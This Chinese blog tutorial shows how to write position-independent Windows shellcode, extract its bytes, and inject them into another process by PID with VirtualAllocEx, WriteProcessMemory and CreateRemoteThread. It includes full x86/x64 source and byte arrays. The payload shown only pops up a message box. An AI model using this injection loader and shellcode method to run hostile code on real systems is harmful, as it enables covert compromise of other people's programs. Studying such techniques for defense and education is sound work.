原理

简单来说,shell code 的核心就是把代码写成 “与地址无关” 的风格,让它不论是在什么环境下都可以被执行。

具体注意:

  • 使用 API 时应该动态调用(GetProAddress)
  • 不能使用全局变量,或者用 static 修饰的变量
  • 在 shellcode 工程中要自定义入口函数
  • 确保调用 API 之前都已经加载了与之对应的 DLL
  • 所有的字符串都要用字符串数组的方式代替

环境搭建

首先新建一个项目,这里我推荐 空项目,之后创建一个 main.cpp 文件:

使用 Release 模式写代码,这是因为 Debug 模式下的代码在转换成汇编后首先都是一个 jmp,然后再跳到我们的功能代码处,但 jmp 指令是 “地址相关” 的 ,所以在转换成 shellcode 时就会出错!

修改项目属性:

编写 ShellCode

32位:

#include <windows.h>FARPROC  getProcAddress(HMODULE hModuleBase);
DWORD getKernel32();int EntryMain()
{// get function address :GetProcAddresstypedef FARPROC(WINAPI* FN_GetProcAddress)(_In_ HMODULE hModule,_In_ LPCSTR lpProcName);FN_GetProcAddress fn_GetProcAddress = (FN_GetProcAddress)getProcAddress((HMODULE)getKernel32());// get function address :LoadLibraryWtypedef HMODULE(WINAPI* FN_LoadLibraryW)(_In_ LPCWSTR lpLibFileName);char xyLoadLibraryW[] = { 'L','o','a','d','L','i','b','r','a','r','y','W',0 };FN_LoadLibraryW fn_LoadLibraryW = (FN_LoadLibraryW)fn_GetProcAddress((HMODULE)getKernel32(), xyLoadLibraryW);// get function address :MessageBoxWtypedef int (WINAPI* FN_MessageBoxW)(_In_opt_ HWND hWnd,_In_opt_ LPCWSTR lpText,_In_opt_ LPCWSTR lpCaption,_In_ UINT uType);wchar_t xy_user32[] = { 'u','s','e','r','3','2','.','d','l','l',0 };char xy_MessageBoxW[] = { 'M','e','s','s','a','g','e','B','o','x','W',0 };FN_MessageBoxW fn_MessageBoxW = (FN_MessageBoxW)fn_GetProcAddress(fn_LoadLibraryW(xy_user32), xy_MessageBoxW);// shellcode testwchar_t xy_Hello[] = { 'S','h','e','l','l','c','o','d','e',0 };wchar_t xy_tip[] = { 'L','Y','S','M',0 };fn_MessageBoxW(NULL, xy_Hello, xy_tip, NULL);return 0;
}// get module base :kernel32.dll
__declspec(naked) DWORD getKernel32()
{__asm{mov eax, fs: [30h]mov eax, [eax + 0ch]mov eax, [eax + 14h]mov eax, [eax]mov eax, [eax]mov eax, [eax + 10h]ret}
}// get function address :GetProcAddress
FARPROC getProcAddress(HMODULE hModuleBase)
{PIMAGE_DOS_HEADER lpDosHeader = (PIMAGE_DOS_HEADER)hModuleBase;PIMAGE_NT_HEADERS32 lpNtHeader = (PIMAGE_NT_HEADERS)((DWORD)hModuleBase + lpDosHeader->e_lfanew);if (!lpNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size) {return NULL;}if (!lpNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress) {return NULL;}PIMAGE_EXPORT_DIRECTORY lpExports = (PIMAGE_EXPORT_DIRECTORY)((DWORD)hModuleBase + (DWORD)lpNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);PDWORD lpdwFunName = (PDWORD)((DWORD)hModuleBase + (DWORD)lpExports->AddressOfNames);PWORD lpword = (PWORD)((DWORD)hModuleBase + (DWORD)lpExports->AddressOfNameOrdinals);PDWORD lpdwFunAddr = (PDWORD)((DWORD)hModuleBase + (DWORD)lpExports->AddressOfFunctions);DWORD dwLoop = 0;FARPROC pRet = NULL;for (; dwLoop <= lpExports->NumberOfNames - 1; dwLoop++) {char* pFunName = (char*)(lpdwFunName[dwLoop] + (DWORD)hModuleBase);if (pFunName[0] == 'G' &&pFunName[1] == 'e' &&pFunName[2] == 't' &&pFunName[3] == 'P' &&pFunName[4] == 'r' &&pFunName[5] == 'o' &&pFunName[6] == 'c' &&pFunName[7] == 'A' &&pFunName[8] == 'd' &&pFunName[9] == 'd' &&pFunName[10] == 'r' &&pFunName[11] == 'e' &&pFunName[12] == 's' &&pFunName[13] == 's'){pRet = (FARPROC)(lpdwFunAddr[lpword[dwLoop]] + (DWORD)hModuleBase);break;}}return pRet;
}

64位:
x64.asm,具体设置参考:https://blog.csdn.net/Simon798/article/details/107051541

.code
getKernel32     procmov rax,gs:[60h]mov rax,[rax+18h]mov rax,[rax+30h]mov rax,[rax]mov rax,[rax]mov rax,[rax+10h]ret
getKernel32     endp
end

main.cpp

#include <windows.h>FARPROC  getProcAddress(HMODULE hModuleBase);
extern "C" PVOID64  getKernel32();int EntryMain()
{// get function address :GetProcAddresstypedef FARPROC(WINAPI* FN_GetProcAddress)(_In_ HMODULE hModule,_In_ LPCSTR lpProcName);FN_GetProcAddress fn_GetProcAddress = (FN_GetProcAddress)getProcAddress((HMODULE)getKernel32());// get function address :LoadLibraryWtypedef HMODULE(WINAPI* FN_LoadLibraryW)(_In_ LPCWSTR lpLibFileName);char xyLoadLibraryW[] = { 'L','o','a','d','L','i','b','r','a','r','y','W',0 };FN_LoadLibraryW fn_LoadLibraryW = (FN_LoadLibraryW)fn_GetProcAddress((HMODULE)getKernel32(), xyLoadLibraryW);// get function address :MessageBoxWtypedef int (WINAPI* FN_MessageBoxW)(_In_opt_ HWND hWnd,_In_opt_ LPCWSTR lpText,_In_opt_ LPCWSTR lpCaption,_In_ UINT uType);wchar_t xy_user32[] = { 'u','s','e','r','3','2','.','d','l','l',0 };char xy_MessageBoxW[] = { 'M','e','s','s','a','g','e','B','o','x','W',0 };FN_MessageBoxW fn_MessageBoxW = (FN_MessageBoxW)fn_GetProcAddress(fn_LoadLibraryW(xy_user32), xy_MessageBoxW);// shellcode testwchar_t xy_Hello[] = { 'S','h','e','l','l','c','o','d','e',0 };wchar_t xy_tip[] = { 'L','Y','S','M',0 };fn_MessageBoxW(NULL, xy_Hello, xy_tip, NULL);Sleep(10000);return 0;
}// get function address :GetProcAddress
FARPROC getProcAddress(HMODULE hModuleBase)
{PIMAGE_DOS_HEADER lpDosHeader = (PIMAGE_DOS_HEADER)hModuleBase;PIMAGE_NT_HEADERS64 lpNtHeader = (PIMAGE_NT_HEADERS64)((ULONG64)hModuleBase + lpDosHeader->e_lfanew);if (!lpNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size) {return NULL;}if (!lpNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress) {return NULL;}PIMAGE_EXPORT_DIRECTORY lpExports = (PIMAGE_EXPORT_DIRECTORY)((ULONG64)hModuleBase + (ULONG64)lpNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);PDWORD lpdwFunName = (PDWORD)((ULONG64)hModuleBase + (ULONG64)lpExports->AddressOfNames);PWORD lpword = (PWORD)((ULONG64)hModuleBase + (ULONG64)lpExports->AddressOfNameOrdinals);PDWORD  lpdwFunAddr = (PDWORD)((ULONG64)hModuleBase + (ULONG64)lpExports->AddressOfFunctions);DWORD dwLoop = 0;FARPROC pRet = NULL;for (; dwLoop <= lpExports->NumberOfNames - 1; dwLoop++) {char* pFunName = (char*)(lpdwFunName[dwLoop] + (ULONG64)hModuleBase);if (pFunName[0] == 'G' &&pFunName[1] == 'e' &&pFunName[2] == 't' &&pFunName[3] == 'P' &&pFunName[4] == 'r' &&pFunName[5] == 'o' &&pFunName[6] == 'c' &&pFunName[7] == 'A' &&pFunName[8] == 'd' &&pFunName[9] == 'd' &&pFunName[10] == 'r' &&pFunName[11] == 'e' &&pFunName[12] == 's' &&pFunName[13] == 's'){pRet = (FARPROC)(lpdwFunAddr[lpword[dwLoop]] + (ULONG64)hModuleBase);break;}}return pRet;
}

提取 ShellCode

打开 studyPE ,拖入编译后的 exe,记录代码段文件偏移:

打开 C32Asm,拖入 exe,转到文件偏移处,拷贝一段连续的 hex 码:

这就是我们需要的 ShellCode 了 (o゚v゚)ノ

使用 ShellCode

写一个 Shell Code 加载器:


#include <windows.h>
#include <iostream>
using namespace std;// x86 shellcode
UCHAR shellcode[] = { 0x55,  0x8B,  0xEC,  0x83,  0xEC,  0x5C,  0x53,  0x56,  0x57,  0xE8,  0x72,  0x01,  0x00,  0x00,  0x8B,  0xD0,  0x33,  0xDB,  0x8B,  0x42,  0x3C,  0x39,  0x5C,  0x10,  0x7C,  0x0F,  0x84,  0x9F,  0x00,  0x00,  0x00,  0x8B,  0x74,  0x10,  0x78,  0x85,  0xF6,  0x0F,  0x84,  0x93,  0x00,  0x00,  0x00,  0x8B,  0x44,  0x16,  0x24,  0x33,  0xC9,  0x8B,  0x7C,  0x16,  0x20,  0x03,  0xC2,  0x89,  0x45,  0xFC,  0x03,  0xFA,  0x8B,  0x44,  0x16,  0x1C,  0x8B,  0x74,  0x16,  0x18,  0x03,  0xC2,  0x89,  0x45,  0xF8,  0x4E,  0x66,  0x0F,  0x1F,  0x44,  0x00,  0x00,  0x8B,  0x04,  0x8F,  0x03,  0xC2,  0x80,  0x38,  0x47,  0x75,  0x4E,  0x80,  0x78,  0x01,  0x65,  0x75,  0x48,  0x80,  0x78,  0x02,  0x74,  0x75,  0x42,  0x80,  0x78,  0x03,  0x50,  0x75,  0x3C,  0x80,  0x78,  0x04,  0x72,  0x75,  0x36,  0x80,  0x78,  0x05,  0x6F,  0x75,  0x30,  0x80,  0x78,  0x06,  0x63,  0x75,  0x2A,  0x80,  0x78,  0x07,  0x41,  0x75,  0x24,  0x80,  0x78,  0x08,  0x64,  0x75,  0x1E,  0x80,  0x78,  0x09,  0x64,  0x75,  0x18,  0x80,  0x78,  0x0A,  0x72,  0x75,  0x12,  0x80,  0x78,  0x0B,  0x65,  0x75,  0x0C,  0x80,  0x78,  0x0C,  0x73,  0x75,  0x06,  0x80,  0x78,  0x0D,  0x73,  0x74,  0x07,  0x41,  0x3B,  0xCE,  0x76,  0xA3,  0xEB,  0x0F,  0x8B,  0x45,  0xFC,  0x8B,  0x5D,  0xF8,  0x0F,  0xB7,  0x04,  0x48,  0x8B,  0x1C,  0x83,  0x03,  0xDA,  0x8D,  0x45,  0xD0,  0xC7,  0x45,  0xD0,  0x4C,  0x6F,  0x61,  0x64,  0x50,  0xC7,  0x45,  0xD4,  0x4C,  0x69,  0x62,  0x72,  0xC7,  0x45,  0xD8,  0x61,  0x72,  0x79,  0x57,  0xC6,  0x45,  0xDC,  0x00,  0xE8,  0xA0,  0x00,  0x00,  0x00,  0x50,  0xFF,  0xD3,  0x33,  0xC9,  0xC7,  0x45,  0xA4,  0x75,  0x00,  0x73,  0x00,  0x66,  0x89,  0x4D,  0xB8,  0x8D,  0x4D,  0xE0,  0x51,  0x8D,  0x4D,  0xA4,  0xC7,  0x45,  0xA8,  0x65,  0x00,  0x72,  0x00,  0x51,  0xC7,  0x45,  0xAC,  0x33,  0x00,  0x32,  0x00,  0xC7,  0x45,  0xB0,  0x2E,  0x00,  0x64,  0x00,  0xC7,  0x45,  0xB4,  0x6C,  0x00,  0x6C,  0x00,  0xC7,  0x45,  0xE0,  0x4D,  0x65,  0x73,  0x73,  0xC7,  0x45,  0xE4,  0x61,  0x67,  0x65,  0x42,  0xC7,  0x45,  0xE8,  0x6F,  0x78,  0x57,  0x00,  0xFF,  0xD0,  0x50,  0xFF,  0xD3,  0x33,  0xC9,  0xC7,  0x45,  0xBC,  0x53,  0x00,  0x68,  0x00,  0x51,  0x66,  0x89,  0x4D,  0xF4,  0x8D,  0x4D,  0xEC,  0x51,  0x8D,  0x4D,  0xBC,  0xC7,  0x45,  0xC0,  0x65,  0x00,  0x6C,  0x00,  0x51,  0x6A,  0x00,  0xC7,  0x45,  0xC4,  0x6C,  0x00,  0x63,  0x00,  0xC7,  0x45,  0xC8,  0x6F,  0x00,  0x64,  0x00,  0xC7,  0x45,  0xCC,  0x65,  0x00,  0x00,  0x00,  0xC7,  0x45,  0xEC,  0x4C,  0x00,  0x59,  0x00,  0xC7,  0x45,  0xF0,  0x53,  0x00,  0x4D,  0x00,  0xFF,  0xD0,  0x5F,  0x5E,  0x33,  0xC0,  0x5B,  0x8B,  0xE5,  0x5D,  0xC3,  0xCC,  0xCC,  0xCC,  0xCC,  0xCC,  0x64,  0xA1,  0x30,  0x00,  0x00,  0x00,  0x8B,  0x40,  0x0C,  0x8B,  0x40,  0x14,  0x8B,  0x00,  0x8B,  0x00,  0x8B,  0x40,  0x10,  0xC3,  0x00,  0x00,  0x00,  0x00,  0x00,  0x00,  0x00,  0x00,  0x00,  0x00,  0x00,  0x00};// x64 shellcode
/*UCHAR shellcode[] = { 0x48,  0x89,  0x5C,  0x24,  0x08,  0x48,  0x89,  0x74,  0x24,  0x10,  0x48,  0x89,  0x7C,  0x24,  0x18,  0x55,  0x41,  0x56,  0x41,  0x57,  0x48,  0x8B,  0xEC,  0x48,  0x81,  0xEC,  0x80,  0x00,  0x00,  0x00,  0xE8,  0x9D,  0x01,  0x00,  0x00,  0x4C,  0x8B,  0xC0,  0x33,  0xDB,  0x8B,  0xFB,  0x48,  0x63,  0x40,  0x3C,  0x42,  0x39,  0x9C,  0x00,  0x8C,  0x00,  0x00,  0x00,  0x0F,  0x84,  0xA7,  0x00,  0x00,  0x00,  0x42,  0x8B,  0x8C,  0x00,  0x88,  0x00,  0x00,  0x00,  0x85,  0xC9,  0x0F,  0x84,  0x97,  0x00,  0x00,  0x00,  0x45,  0x8B,  0x54,  0x08,  0x24,  0x49,  0x8D,  0x04,  0x08,  0x41,  0x8B,  0x4C,  0x08,  0x20,  0x4D,  0x03,  0xD0,  0x44,  0x8B,  0x58,  0x1C,  0x49,  0x03,  0xC8,  0x44,  0x8B,  0x48,  0x18,  0x4D,  0x03,  0xD8,  0x41,  0xFF,  0xC9,  0x8B,  0xD3,  0x8B,  0x01,  0x49,  0x03,  0xC0,  0x80,  0x38,  0x47,  0x75,  0x4E,  0x80,  0x78,  0x01,  0x65,  0x75,  0x48,  0x80,  0x78,  0x02,  0x74,  0x75,  0x42,  0x80,  0x78,  0x03,  0x50,  0x75,  0x3C,  0x80,  0x78,  0x04,  0x72,  0x75,  0x36,  0x80,  0x78,  0x05,  0x6F,  0x75,  0x30,  0x80,  0x78,  0x06,  0x63,  0x75,  0x2A,  0x80,  0x78,  0x07,  0x41,  0x75,  0x24,  0x80,  0x78,  0x08,  0x64,  0x75,  0x1E,  0x80,  0x78,  0x09,  0x64,  0x75,  0x18,  0x80,  0x78,  0x0A,  0x72,  0x75,  0x12,  0x80,  0x78,  0x0B,  0x65,  0x75,  0x0C,  0x80,  0x78,  0x0C,  0x73,  0x75,  0x06,  0x80,  0x78,  0x0D,  0x73,  0x74,  0x0D,  0xFF,  0xC2,  0x48,  0x83,  0xC1,  0x04,  0x41,  0x3B,  0xD1,  0x76,  0x9D,  0xEB,  0x0E,  0x8B,  0xC2,  0x41,  0x0F,  0xB7,  0x0C,  0x42,  0x41,  0x8B,  0x3C,  0x8B,  0x49,  0x03,  0xF8,  0xC7,  0x45,  0xC0,  0x4C,  0x6F,  0x61,  0x64,  0xC7,  0x45,  0xC4,  0x4C,  0x69,  0x62,  0x72,  0xC7,  0x45,  0xC8,  0x61,  0x72,  0x79,  0x57,  0xC6,  0x45,  0xCC,  0x00,  0xE8,  0xBF,  0x00,  0x00,  0x00,  0x48,  0x8B,  0xC8,  0x48,  0x8D,  0x55,  0xC0,  0xFF,  0xD7,  0x48,  0x8D,  0x4D,  0xE8,  0xC7,  0x45,  0xE8,  0x75,  0x00,  0x73,  0x00,  0xC7,  0x45,  0xEC,  0x65,  0x00,  0x72,  0x00,  0xC7,  0x45,  0xF0,  0x33,  0x00,  0x32,  0x00,  0xC7,  0x45,  0xF4,  0x2E,  0x00,  0x64,  0x00,  0xC7,  0x45,  0xF8,  0x6C,  0x00,  0x6C,  0x00,  0x66,  0x89,  0x5D,  0xFC,  0xC7,  0x45,  0xB0,  0x4D,  0x65,  0x73,  0x73,  0xC7,  0x45,  0xB4,  0x61,  0x67,  0x65,  0x42,  0xC7,  0x45,  0xB8,  0x6F,  0x78,  0x57,  0x00,  0xFF,  0xD0,  0x48,  0x8B,  0xC8,  0x48,  0x8D,  0x55,  0xB0,  0xFF,  0xD7,  0x45,  0x33,  0xC9,  0xC7,  0x45,  0xD0,  0x53,  0x00,  0x68,  0x00,  0x4C,  0x8D,  0x45,  0xA0,  0xC7,  0x45,  0xD4,  0x65,  0x00,  0x6C,  0x00,  0x48,  0x8D,  0x55,  0xD0,  0xC7,  0x45,  0xD8,  0x6C,  0x00,  0x63,  0x00,  0x33,  0xC9,  0xC7,  0x45,  0xDC,  0x6F,  0x00,  0x64,  0x00,  0xC7,  0x45,  0xE0,  0x65,  0x00,  0x00,  0x00,  0xC7,  0x45,  0xA0,  0x4C,  0x00,  0x59,  0x00,  0xC7,  0x45,  0xA4,  0x53,  0x00,  0x4D,  0x00,  0x66,  0x89,  0x5D,  0xA8,  0xFF,  0xD0,  0x4C,  0x8D,  0x9C,  0x24,  0x80,  0x00,  0x00,  0x00,  0x33,  0xC0,  0x49,  0x8B,  0x5B,  0x20,  0x49,  0x8B,  0x73,  0x28,  0x49,  0x8B,  0x7B,  0x30,  0x49,  0x8B,  0xE3,  0x41,  0x5F,  0x41,  0x5E,  0x5D,  0xC3,  0xCC,  0xCC,  0xCC,  0xCC,  0xCC,  0xCC,  0xCC,  0xCC,  0x65,  0x48,  0x8B,  0x04,  0x25,  0x60,  0x00,  0x00,  0x00,  0x48,  0x8B,  0x40,  0x18,  0x48,  0x8B,  0x40,  0x30,  0x48,  0x8B,  0x00,  0x48,  0x8B,  0x00,  0x48,  0x8B,  0x40,  0x10,  0xC3,  0x00,  0x00,  0x00,  0x00};*/
int main()
{// some variables statementDWORD targetPid = 0;HANDLE h_target = NULL;LPVOID p_base = NULL;HANDLE h_thread = NULL;// get target process handlecout << "input target process id:";cin >> targetPid;h_target = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPid);if (h_target == NULL) {cout << "OpenProcess failed." << endl;goto main_end;}// request memory in target process p_base  = VirtualAllocEx(h_target, NULL, sizeof(shellcode), MEM_COMMIT ,PAGE_EXECUTE_READWRITE);if (p_base == NULL) {cout << "VirtualAllocEx failed." << endl;goto main_end;}// write shellcode in requested memoryif (!WriteProcessMemory(h_target, p_base, (LPVOID)shellcode, sizeof(shellcode), NULL)) {cout << "WriteProcessMemory failed." << endl;goto main_end;}// create thread and execute shellcodeh_thread = CreateRemoteThread(h_target, 0, 0,(LPTHREAD_START_ROUTINE)p_base, NULL, 0, NULL);if (h_thread == NULL) {cout << "CreateRemoteThread failed." << endl;goto main_end;}main_end:// when MessageBox appears but you don't click the button,// now , call VirtualFreeEx to free memory then click button will lead target procedure to breakdown./*if (p_base) {VirtualFreeEx(h_target, p_base, 0, MEM_RELEASE);}*/if (h_target)CloseHandle(h_target);if (h_thread)CloseHandle(h_thread);getchar();return 0;
}

测试

32位 shellcode 注入 32位程序(注入器也要编译成32位),成功:

64位 shell code 注入 64位程序(注入器也要编译成 64位),成功:

ShellCode —— 入门相关推荐

  1. ShellCode入门(提取ShellCode)

    什么是ShellCode: 在计算机安全中,shellcode是一小段代码,可以用于软件漏洞利用的载荷.被称为"shellcode"是因为它通常启动一个命令终端,攻击者可以通过这个 ...

  2. c# 定位内存快速增长_CTF丨Linux Pwn入门教程:针对函数重定位流程的相关测试(下)...

    Linux Pwn入门教程系列分享已到尾声,本套课程是作者依据i春秋Pwn入门课程中的技术分类,并结合近几年赛事中出现的题目和文章整理出一份相对完整的Linux Pwn教程. 教程仅针对i386/am ...

  3. EXP1 PC平台逆向破解

    一.实践目标 1.本次实践的对象是一个名为20154310(原为pwn1)的linux可执行文件. 2.该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串. 3.该 ...

  4. 20155232《网络对抗》 Exp1 PC平台逆向破解(5)M

    20155232<网络对抗> Exp1 PC平台逆向破解(5)M 实验内容 (1).掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码(1分) (2)掌握反汇编与十六进制编程 ...

  5. 2019-2020-2 20175227张雪莹《网络对抗技术》 Exp1 PC平台逆向破解

    2019-2020-2 20175227张雪莹<网络对抗技术> Exp1 PC平台逆向破解 目录 0. 实验目标 1. 实验内容 1.1 直接修改程序机器指令,改变程序执行流程 1.2 通 ...

  6. 2017-2018-2 20155314《网络对抗技术》Exp2 后门原理与实践

    2017-2018-2 20155314<网络对抗技术>Exp2 后门原理与实践 目录 实验要求 实验内容 实验环境 预备知识 1.后门概念 2.常用后门工具 实验步骤 1 用nc或net ...

  7. windows下shellcode编写入门

    0x00.介绍 比方说你手头上有一个IE或FlashPlayer现成的漏洞利用代码,但它只能够打开计算器calc.exe.但是这实际上并没有什么卵用,不是吗?你真正想要的是可以执行一些远程命令或实现其 ...

  8. Linux shellcode 编写入门 (转)

    刺猬@http://blog.csdn.net/littlehedgehog 无意当中在安全焦点上面看到的,很入门的一篇文章,不错: 原文地址: http://www.xfocus.net/artic ...

  9. ShellCode的编写入门

    上次学习了下堆喷漏洞的原理,虽说之前有学习过缓冲区溢出的原理,但还没了解过堆喷这个概念,于是趁此机会学习了,顺便复习了缓冲区溢出这块知识,之前由于各种原因对Shellcode的编写只是了解个大概,并没 ...

最新文章

  1. 你的微笑,拂过我的心海
  2. python javascript配合,在python部署时组合javascript文件
  3. php no input file specified.,nginx+php出现No input file specified解决办法
  4. eas库存状态调整单不能反审核_审核与反审核
  5. Python操作MySQL存储,这些你都会了吗?
  6. s:TextInput优化
  7. 一个老鸟眼中“IT民工”的发展方向
  8. Java虚拟机知识点【方法调用】
  9. 支付宝异步回调验证签名的那些走过的坑
  10. 从dist到es:发一个NPM库,我蜕了一层皮
  11. c++程序内嵌lua字节码
  12. DICOM笔记-使用DCMTK读取DICOM文件保存DICOM文件
  13. Oracle表被锁死如何解锁
  14. POJ 3322 BFS
  15. 《软件技术学研会-技术培训》第0章 操作系统安装
  16. [FMG]两个简单的JSP+servlet小程序
  17. 通用量子操作系统,收揽全球量子硬件20%市场份额
  18. 构建能源物联网,助力电力物联网数据服务
  19. iOS英语背单词神器-背轻松-单词卡APP系列推荐
  20. 初次接触DHT11温度传感器

热门文章

  1. R语言标准普尔500指数Garch(1,1)模型
  2. SAP中BOM状态与MRP运行的影响测试
  3. iPad死机,怎么办?
  4. 请大家认识一下:住杭州的型男外籍全栈设计师
  5. 【漫事杂谈007】哈利波特电影一共有几部
  6. 考博英语长难句分析-连接词that、for与what的用法
  7. 【问题解决】ESP32开发板上的CP210xUSB转串口坏了怎么办
  8. OpenGl 之学习笔记 glTexCoord2f() 函数以及纹理相关知识总结
  9. matlab套利,期现套利-现货组合构建(1)-市值权重法
  10. django创建应用程序_使用Django创建基于机器学习的Web应用程序